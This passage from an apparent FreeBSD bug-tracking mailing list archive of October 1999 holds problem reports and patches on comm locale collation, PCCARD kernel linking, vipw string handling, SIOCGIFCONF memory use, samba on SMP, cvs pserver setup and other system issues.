get_in_tkt.c \ > get_svc_in_tkt.c getrealm.c k_localtime.c krb_err_txt.c \ > > -GAWollman > > -- > Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same > wollman@lcs.mit.edu | O Siem / The fires of freedom > Opinions not those of| Dance in the burning flame > MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick > Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Oct 21 8:57:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from isabase.philol.msu.ru (isabase.philol.msu.ru [195.208.217.73]) by hub.freebsd.org (Postfix) with ESMTP id EE81C14F5B; Thu, 21 Oct 1999 08:56:53 -0700 (PDT) (envelope-from grg@isabase.philol.msu.ru) Received: (from grg@localhost) by isabase.philol.msu.ru (8.9.3/8.9.2) id TAA36290; Thu, 21 Oct 1999 19:56:53 +0400 (MSD) (envelope-from grg) Date: Thu, 21 Oct 1999 19:56:51 +0400 From: Grigoriy Strokin To: freebsd-hackers@freebsd.org Cc: ache@freebsd.org, freebsd-bugs@freebsd.org Subject: comm doesn't obey current locale collation Message-ID: <19991021195649.A36122@isabase.philol.msu.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=koi8-r Content-Transfer-Encoding: 8bit X-Mailer: Mutt 1.0pre3i Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, 6 months ago I have sent a 'send-pr' about /usr/bin/comm (Problem Report bin/11221). Still there are no follow-ups, no has been this report assigned to any responsible person. What might this mean? ---------------- forward --------------- Problem Report bin/11221 comm doesn't obey current locale collation Confidential no Severity serious Priority medium Responsible freebsd-bugs@freebsd.org State open Class sw-bug Submitter-Id current-users Arrival-Date Mon Apr 19 10:40:03 PDT 1999 Last-Modified never Originator Grigoriy Strokin grg@philol.msu.ru Release FreeBSD 3.1-STABLE i386 Organization Moscow University Environment $LANG set to ru_RU.KOI8-R Description Comm produces wrong results when processing 8-bit text files sorted with /usr/bin/sort according to current locale (ru_RU.KOI8-R) How-To-Repeat Unpack the following shar-archive and call LANG=ru_RU.KOI8-R comm jaa.srt jaa2.srt Several identical characters will appear in both first and second column, whereas this must not occur with these files that were produced as output of LANG=ru_RU.KOI8-R sort ---------------------CUT------------------------------------------ # This is a shell archive. Save it in a file, remove anything before # this line, and then unpack it by entering "sh file". Note, it may # create directories; files and directories will be owned by you and # have default permissions. # # This archive contains: # # jaa.srt # jaa2.srt # echo x - jaa.srt sed 's/^X//' >jaa.srt << 'END-of-jaa.srt' Xô Xõ Xæ Xö Xé Xç Xà Xù Xü Xñ Xý Xû Xø Xá Xó END-of-jaa.srt echo x - jaa2.srt sed 's/^X//' >jaa2.srt << 'END-of-jaa2.srt' Xô Xõ Xæ Xè Xö Xé Xç Xà Xù Xü Xý Xø Xá Xó END-of-jaa2.srt exit Fix Apply the patch: --- comm.c.orig Mon Apr 19 16:57:56 1999 +++ comm.c Mon Apr 19 19:45:49 1999 @@ -55,9 +55,29 @@ #include #include #include +#include +#include #define MAXLINELEN (LINE_MAX + 1) +/* The standard library strcoll, an analog of strcmp that takes into account + * the current locale, but strcasecmp does not have such an analog. + * So let's define a replacement, locale_dependent_strcasecmp + * */ + +int locale_dependent_strcasecmp(const char *s1, const char *s2) +{ + char a1[MAXLINELEN], a2[MAXLINELEN]; + char *c; + for (c = a1; *s1; c++, s1++) + *c = toupper((unsigned char)(*s1)); + *c = 0; + for (c = a2; *s2; c++, s2++) + *c = toupper((unsigned char)(*s2)); + *c = 0; + return strcoll(a1, a2); +} + char *tabs[] = { "", "\t", "\t\t" }; FILE *file __P((char *)); @@ -74,7 +94,7 @@ FILE *fp1, *fp2; char *col1, *col2, *col3; char **p, line1[MAXLINELEN], line2[MAXLINELEN]; - + setlocale(LC_ALL, ""); flag1 = flag2 = flag3 = 1; iflag = 0; @@ -139,9 +159,9 @@ /* lines are the same */ if(iflag) - comp = strcasecmp(line1, line2); + comp = locale_dependent_strcasecmp(line1, line2); else - comp = strcmp(line1, line2); + comp = strcoll(line1, line2); if (!comp) { read1 = read2 = 1; ====== CUT ======== -- === Grigoriy Strokin, Lomonosov University (MGU), Moscow === === contact info: http://isabase.philol.msu.ru/~grg/ === To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Oct 21 12: 0:11 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B7DA314EE1 for ; Thu, 21 Oct 1999 12:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA00830; Thu, 21 Oct 1999 12:00:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from mailserv.redhat.de (wg.redhat.de [193.103.254.4]) by hub.freebsd.org (Postfix) with ESMTP id 7AD7514EEF for ; Thu, 21 Oct 1999 05:49:36 -0700 (PDT) (envelope-from root@mailserv.redhat.de) Message-Id: <199910210944.LAA10183@redhat.de> Date: Thu, 21 Oct 1999 11:44:03 +0200 (CEST) From: Bernhard Rosenkraenzer Reply-To: Bernhard Rosenkraenzer To: FreeBSD-gnats-submit@freebsd.org Subject: i386/14446: Doesn't boot on Mobile Celeron Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14446 >Category: i386 >Synopsis: Doesn't boot on Mobile Celeron >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Oct 21 12:00:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Bernhard Rosenkraenzer >Release: FreeBSD 4.0-CURRENT i386 >Organization: Red Hat Software >Environment: Gericom 3xC notebook: Mobile Celeron 400 CPU Intel 440BX/ZX Host/PCI bridge PIIX4 IDE+USB interface ATI Mach64 VGA Chipset ESS Maestro 2E soundchip some i82365 compatible PCMCIA controller from Texas Instruments 128 MB SDRAM normal floppy drive IDE harddisk+DVD-ROM SystemSoft MobilePRO BIOS 1.01 (R1.12) >Description: FreeBSD 4.0-CURRENT 19991012 and FreeBSD 3.3-STABLE 19991012 both fail to boot on this machine. The kernel hangs at installation before entering the config editor, right after printing Timecounter "i8254" frequency 1193182 Hz The same CD works well on a K6-450 and a Dual PIII-450. Aside from the Mobile Celeron CPU and maybe the odd BIOS, there's nothing unusual in this box. >How-To-Repeat: Install on a notebook with a Mobile Celeron CPU and SystemSoft MobilePRO BIOS >Fix: no fix known at this time >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Oct 21 12: 0:10 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6DF0914F82 for ; Thu, 21 Oct 1999 12:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id MAA00848; Thu, 21 Oct 1999 12:00:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from misha.cisco.com (misha.cisco.com [171.69.206.50]) by hub.freebsd.org (Postfix) with ESMTP id 3E19E15013 for ; Thu, 21 Oct 1999 08:49:30 -0700 (PDT) (envelope-from mi@misha.cisco.com) Received: (from mi@localhost) by misha.cisco.com (8.9.3/8.9.1) id LAA03185; Thu, 21 Oct 1999 11:49:29 -0400 (EDT) (envelope-from mi) Message-Id: <199910211549.LAA03185@misha.cisco.com> Date: Thu, 21 Oct 1999 11:49:29 -0400 (EDT) From: Mikhail Teterin Reply-To: mi@aldan.algebra.com To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14448: ftp-client may not recognize failure, report erroneous stats Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14448 >Category: bin >Synopsis: ftp-client may not recognize failure, report erroneous stats >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Thu Oct 21 12:00:02 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Mikhail Teterin >Release: FreeBSD 3.3-STABLE i386 >Organization: Virtual Estates, Inc. >Environment: >Description: I was downloading a huge file and did not have enough room, as it turned out. The ftp-client said exactly the following: /home: write failed, file system is full ftp: local: 6.1-i386.iso: No space left on device 10% |********* | 67871 KB 14:47 ETA 426 Data connection: Success. 69500896 bytes received in 102.02 seconds (665.31 KB/s) ftp> It only got 10%, but the rate reported was computed as if it received it all. >How-To-Repeat: See above... >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Thu Oct 21 14:30: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 20B5C14FC9 for ; Thu, 21 Oct 1999 14:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA30528; Thu, 21 Oct 1999 14:30:02 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Date: Thu, 21 Oct 1999 14:30:02 -0700 (PDT) Message-Id: <199910212130.OAA30528@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Brian Topping Subject: Re: bin/11669: gcc 2.7.2.1 gets bad magic error linking aout binary Reply-To: Brian Topping Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/11669; it has been noted by GNATS. From: Brian Topping To: freebsd-gnats-submit@freebsd.org, murphyp1@msu.edu Cc: Subject: Re: bin/11669: gcc 2.7.2.1 gets bad magic error linking aout binary Date: Thu, 21 Oct 1999 14:25:26 -0700 Hello, I am having the same problem using 3.2-RELEASE, GCC 2.7.2.3 while building the 3.3-STABLE tree using 'make upgrade'. Any ideas appreciated. Brian Topping topping@digidemic.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Oct 22 0:10: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 18F6914E2B for ; Fri, 22 Oct 1999 00:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA74771; Fri, 22 Oct 1999 00:10:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from maulwurf.franken.de (maulwurf.franken.de [193.141.110.9]) by hub.freebsd.org (Postfix) with ESMTP id AB64814D44 for ; Fri, 22 Oct 1999 00:09:26 -0700 (PDT) (envelope-from gaspode.franken.de!tanis@maulwurf.franken.de) Received: by maulwurf.franken.de via rmail with stdio id for FreeBSD-gnats-submit@freebsd.org; Wed, 20 Oct 1999 17:54:00 +0200 (MET DST) (Smail-3.2 1996-Jul-4 #1 built DST-May-30) Received: (from tanis@localhost) by gaspode.franken.de (8.9.3/8.9.3) id RAA35884; Wed, 20 Oct 1999 17:51:17 +0200 (CEST) (envelope-from tanis) Message-Id: <199910201551.RAA35884@gaspode.franken.de> Date: Wed, 20 Oct 1999 17:51:17 +0200 (CEST) From: tanis@gaspode.franken.de Reply-To: tanis@gaspode.franken.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: misc/14455: make release failure with PCCARD kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14455 >Category: misc >Synopsis: make release failure with PCCARD kernel >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Oct 22 00:10:00 PDT 1999 >Closed-Date: >Last-Modified: >Originator: German Tischler >Release: FreeBSD 4.0-CURRENT i386 >Organization: private >Environment: >Description: make release fails because of missing symbols for if_ed_isa.o: linking kernel.debug if_ed_isa.o: In function `ed_isa_probe': /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x45): undefined reference to `ed_probe_WD80x3' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x54): undefined reference to `ed_release_resources' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x5a): undefined reference to `ed_probe_3Com' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x69): undefined reference to `ed_release_resources' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x6f): undefined reference to `ed_probe_Novell' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x7e): undefined reference to `ed_release_resources' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x84): undefined reference to `ed_probe_HP_pclanp' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x93): undefined reference to `ed_release_resources' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0xa4): undefined reference to `ed_alloc_irq' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0xaf): undefined reference to `ed_release_resources' if_ed_isa.o: In function `ed_isa_attach': /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0xef): undefined reference to `ed_alloc_port' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x109): undefined reference to `ed_alloc_memory' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x11a): undefined reference to `ed_alloc_irq' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x127): undefined reference to `edintr' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x152): undefined reference to `ed_attach' /sys/compile/BOOTMFS/../../dev/ed/if_ed_isa.c(.text+0x15a): undefined reference to `ed_release_resources' *** Error code 1 Stop in /usr/src/sys/compile/BOOTMFS. >How-To-Repeat: > cd /sys/i386/conf > config -r PCCARD > cd /sys/compile/PCCARD > make depend all or > cd /usr/src/release > make release >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Oct 22 2:46:58 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 977B914EE5; Fri, 22 Oct 1999 02:46:57 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Received: (from sheldonh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA86186; Fri, 22 Oct 1999 02:46:57 -0700 (PDT) (envelope-from sheldonh@FreeBSD.org) Date: Fri, 22 Oct 1999 02:46:57 -0700 (PDT) From: Message-Id: <199910220946.CAA86186@freefall.freebsd.org> To: sheldonh@FreeBSD.org, freebsd-bugs@FreeBSD.org, mdodd@FreeBSD.org Subject: Re: misc/14455: make release failure with PCCARD kernel Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: make release failure with PCCARD kernel Responsible-Changed-From-To: freebsd-bugs->mdodd Responsible-Changed-By: sheldonh Responsible-Changed-When: Fri Oct 22 02:46:11 PDT 1999 Responsible-Changed-Why: Matthew's code, by the looks of things. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Oct 22 3:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id B030C14F3B for ; Fri, 22 Oct 1999 03:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA89789; Fri, 22 Oct 1999 03:40:01 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 96D4A14FFB; Fri, 22 Oct 1999 03:36:15 -0700 (PDT) Message-Id: <19991022103615.96D4A14FFB@hub.freebsd.org> Date: Fri, 22 Oct 1999 03:36:15 -0700 (PDT) From: tarkhil@over.ru To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: kern/14457: SIOCGIFCONF uses too much memory Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14457 >Category: kern >Synopsis: SIOCGIFCONF uses too much memory >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Oct 22 03:40:01 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Alex Povolotsky >Release: FreeBSD 3.3-STABLE >Organization: >Environment: FreeBSD enterprise.infinity.ru 3.3-STABLE FreeBSD 3.3-STABLE #0: Thu Oct 21 22:37:35 MSD 1999 root@enterprise.infinity.ru:/usr/src/sys/compile/ENTERPRISE i386 >Description: On a computer with many interfaces (8 ppp, 1 ether, 1 discard, 1 tunnel) SIOCGIFCONF asometimes uses more memory than specified in ifc_len member of ifc structure. This can cause (and causes!) corruption of program data. >How-To-Repeat: Build a kernel with lots of interfaces. call ioctl with less than 300 bytes of buffer (specified in ifc_len). Watch ioctl returining ifc_len INCREASED and look for memory corruption. qmail on the computer with 12 network interfaces fails when one of ppp interfaces is up. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Oct 22 21:18:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from sir-alan.chem.indiana.edu (sir-alan.chem.indiana.edu [129.79.137.215]) by hub.freebsd.org (Postfix) with ESMTP id 0EA1B14D28 for ; Fri, 22 Oct 1999 21:18:12 -0700 (PDT) (envelope-from msquires@sir-alan.chem.indiana.edu) Received: (from msquires@localhost) by sir-alan.chem.indiana.edu (8.9.2/8.9.2) id XAA06694 for freebsd-bugs@freebsd.org; Fri, 22 Oct 1999 23:20:05 -0500 (EST) (envelope-from msquires) From: Mike Squires Message-Id: <199910230420.XAA06694@sir-alan.chem.indiana.edu> Subject: samba fails under SMP kernel To: freebsd-bugs@freebsd.org Date: Fri, 22 Oct 1999 23:20:05 -0500 (EST) X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm not absolutely positive this is not my mistake, but so far I haven't been able to find another explanation other than a bug in either samba or the SMP kernel on my system. Hardware is Everex PO-6200 dual PPro running 3.3-RELEASE. The config file contains the following, which are the same as the output from mptable: options SMP options APIC_IO options NCPU=2 options NBUS=2 options NAPIC=1 options NINTR=24 The kernel loads and runs fine with everything else (NETATALK, IPX, changer support, ccd/vinum, and bpf are also configured). I have seen a steady 3MB/sec NFS (xperfmon3.0) and 660K/sec on a 1GB file with mars_nwe, no problems. With 1.9, 2.0.2, 2.0.5a with or without MSG_WAITALL, 2.06.pre1, or 2.0.6pre2, and the SMP kernel I can't copy more than 2 - 5MB to the samba server before the connection is dropped by smb. The log files don't show anything useful; they just stop, and eventually the connection is closed. With the single CPU kernel and everything else as is, large files can be copied but they are copied (2.0.5a, 2.0.6pre1/2) fairly slowly, with 2.0.6pre2 being significantly faster - which is the expected behavior. I havne't included other data, since it would be quite large - the full samba logs are 100K at log level 10. I suspect that the input error rate goes up quite a bit when samba is being written to (card is Intel Pro100B; without samba I'm getting zero input errors in 2 million frames, 2 output on 500,000, 100Mbit full duplex) but I haven't been able to prove that, yet. I'm going to run a packet trace next; any other ideas? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 2: 8:53 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from wint.itfs.nsk.su (wint.itfs.nsk.su [212.20.32.43]) by hub.freebsd.org (Postfix) with ESMTP id C3F7A14CB6 for ; Sat, 23 Oct 1999 02:08:40 -0700 (PDT) (envelope-from nnd@wint.itfs.nsk.su) Received: (from nnd@localhost) by wint.itfs.nsk.su (8.9.3/8.9.3) id QAA63930; Sat, 23 Oct 1999 16:07:53 +0700 (NOVST) (envelope-from nnd) Date: Sat, 23 Oct 1999 16:07:53 +0700 (NOVST) Message-Id: <199910230907.QAA63930@wint.itfs.nsk.su> From: Nickolay Dudorov To: bugs@freebsd.org Subject: Re: misc/14455: make release failure with PCCARD kernel In-Reply-To: <199910201551.RAA35884@gaspode.franken.de> User-Agent: tin/pre-1.4-19990927 ("Nine While Nine") (UNIX) (FreeBSD/4.0-CURRENT (i386)) Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In <199910201551.RAA35884@gaspode.franken.de> tanis@gaspode.franken.de wrote: > >>Number: 14455 >>Category: misc >>Synopsis: make release failure with PCCARD kernel ... >>Arrival-Date: Fri Oct 22 00:10:00 PDT 1999 ... >>Release: FreeBSD 4.0-CURRENT i386 ... >>How-To-Repeat: > > > cd /sys/i386/conf > > config -r PCCARD > > cd /sys/compile/PCCARD > > make depend all > > or > > > cd /usr/src/release > > make release > >>Fix: To fix - i.e. to make PCCARD kernel compile and link successfully (I can't test it on real hardware) apply the following patch : diff -bu sys/dev/ed/if_ed_isa.c.ORIG sys/dev/ed/if_ed_isa.c ================================================================ --- sys/dev/ed/if_ed_isa.c.ORIG Fri Oct 15 10:12:47 1999 +++ sys/dev/ed/if_ed_isa.c Sat Oct 23 15:55:28 1999 @@ -27,6 +27,9 @@ * $FreeBSD: src/sys/dev/ed/if_ed_isa.c,v 1.2 1999/10/15 03:12:47 mdodd Exp $ */ +#include "card.h" +#if NCARD == 0 + #include #include #include @@ -154,3 +157,4 @@ static devclass_t ed_isa_devclass; DRIVER_MODULE(ed, isa, ed_isa_driver, ed_isa_devclass, 0, 0); +#endif To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 6:47:29 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6877D14DB3 for ; Sat, 23 Oct 1999 06:47:19 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA88797; Sat, 23 Oct 1999 06:47:19 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 02E5314E30; Fri, 22 Oct 1999 10:40:20 -0700 (PDT) Message-Id: <19991022174020.02E5314E30@hub.freebsd.org> Date: Fri, 22 Oct 1999 10:40:20 -0700 (PDT) From: timj@systembureau.com To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: conf/14463: cvs pserver does not work with out-of-the-box configuration Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14463 >Category: conf >Synopsis: cvs pserver does not work with out-of-the-box configuration >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Sat Oct 23 06:47:18 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Tim Jansen >Release: 3.3 >Organization: >Environment: FreeBSD fizz.systembureau.com 3.3-RELEASE FreeBSD 3.3-RELEASE #0: Thu Sep 16 23:40:35 GMT 1999 jkh@highwing.cdrom.com:/usr/src/sys/compile/GENERIC i386 >Description: I installed the 3.3 distribution (on a P200 no-name machine) and wanted to install the cvs pserver. So I looked in the inetd.conf file and found the following cvspserver lines. # # CVS servers - for master CVS repositories only! # #cvspserver stream tcp nowait root /usr/bin/cvs cvs pserver #cvs stream tcp nowait root /usr/bin/cvs cvs kserver I uncommmented them, restarted inetd of course, but when I tried to log into the server, i get the following message after entering my password: [timon:~]cvs login (Logging in to timj@fizz.sfabrik.de) CVS password: Server configuration missing --allow-root in inetd.conf cvs [login aborted]: authorization failed: server fizz.sfabrik.de rejected access The "Server configuration..." message seems to come from cvs. When I telnet to the server, inetd accepts the TCP connection and I can talk to CVS. >How-To-Repeat: Install FreeBSD, uncomment the inetd.conf lines. >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 6:47:36 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4038314DDB for ; Sat, 23 Oct 1999 06:47:19 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA88815; Sat, 23 Oct 1999 06:47:19 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from internal.mail.demon.net (internal.mail.demon.net [193.195.224.3]) by hub.freebsd.org (Postfix) with ESMTP id 2B73814D02 for ; Fri, 22 Oct 1999 11:31:47 -0700 (PDT) (envelope-from fanf@demon.net) Received: from fanf.eng.demon.net (fanf.eng.demon.net [195.11.55.89]) by internal.mail.demon.net with ESMTP id TAA04935; Fri, 22 Oct 1999 19:31:45 +0100 (BST) Received: from fanf by fanf.eng.demon.net with local (Exim 3.03 #2) id 11ejT9-0005Sg-00 for FreeBSD-gnats-submit@freebsd.org; Fri, 22 Oct 1999 19:31:15 +0100 Message-Id: Date: Fri, 22 Oct 1999 19:31:15 +0100 From: Tony Finch Reply-To: fanf@demon.net To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: bin/14465: vipw has dodgy string handling Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 14465 >Category: bin >Synopsis: vipw depends upon malloc() returning zero-filled memory >Confidential: no >Severity: non-critical >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sat Oct 23 06:47:19 PDT 1999 >Closed-Date: >Last-Modified: >Originator: Tony Finch >Release: FreeBSD 3.3-STABLE-19990927 i386 >Organization: Demon Internet Ltd >Environment: FreeBSD fanf.eng.demon.net 3.3-STABLE-19990927 FreeBSD 3.3-STABLE-19990927 #14: Mon Sep 27 02:50:55 BST 1999 root@fanf.eng.demon.net:/usr/src/sys/compile/DELL-PREC410 i386 >Description: If vipw is invoked like `vipw -d /some/directory/not/ending/in/slash` then it replaces the terminating '\0' with '/' before calling strcat. This would cause heap corruption if malloc() didn't happen to return a block of zeroes. >How-To-Repeat: >Fix: --- /usr/src/usr.sbin/vipw/vipw.c.orig Fri Oct 22 19:24:51 1999 +++ /usr/src/usr.sbin/vipw/vipw.c Fri Oct 22 19:25:51 1999 @@ -81,8 +81,9 @@ err(1, NULL); strcpy(masterpasswd, optarg); if (masterpasswd[strlen(masterpasswd) - 1] != '/') - masterpasswd[strlen(masterpasswd)] = '/'; - strcat(masterpasswd, _MASTERPASSWD); + strcat(masterpasswd, "/" _MASTERPASSWD); + else + strcat(masterpasswd, _MASTERPASSWD); if ((mppath = strdup(optarg)) == NULL) err(1, NULL); if (mppath[strlen(mppath) - 1] == '/') >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Sat Oct 23 6:47:42 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id CAC8514F10 for ; Sat, 23 Oct 1999 06:47:22 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id GAA88880; Sat, 23 Oct 1999 06:47:22 -0700 (PDT) (envelope-from gnats@FreeBSD.org) Received: from iss-p4.lbl.gov (iss-p4.lbl.gov [131.243.2.29]) by hub.freebsd.org (Postfix) with ESMTP id 5DE4614C85 for ; Fri, 22 Oct 1999 19:32:04 -0700 (PDT) (envelope-from jin@iss-p4.lbl.gov) Received: (from jin@localhost) by iss-p4.lbl.gov (8.9.3/8.9.3) id TAA51623; Fri, 22 Oct 1999 19:32:02 -0700 (PDT) (envelope-from jin) Message-Id: <199910230232.TAA51623@iss-p4.lbl.gov> Date: Fri, 22 Oct 1999 19:32:02 -0700 (PDT) From: Jin Guojun (FTG staff) Reply-To: j_guojun@lbl.gov To: 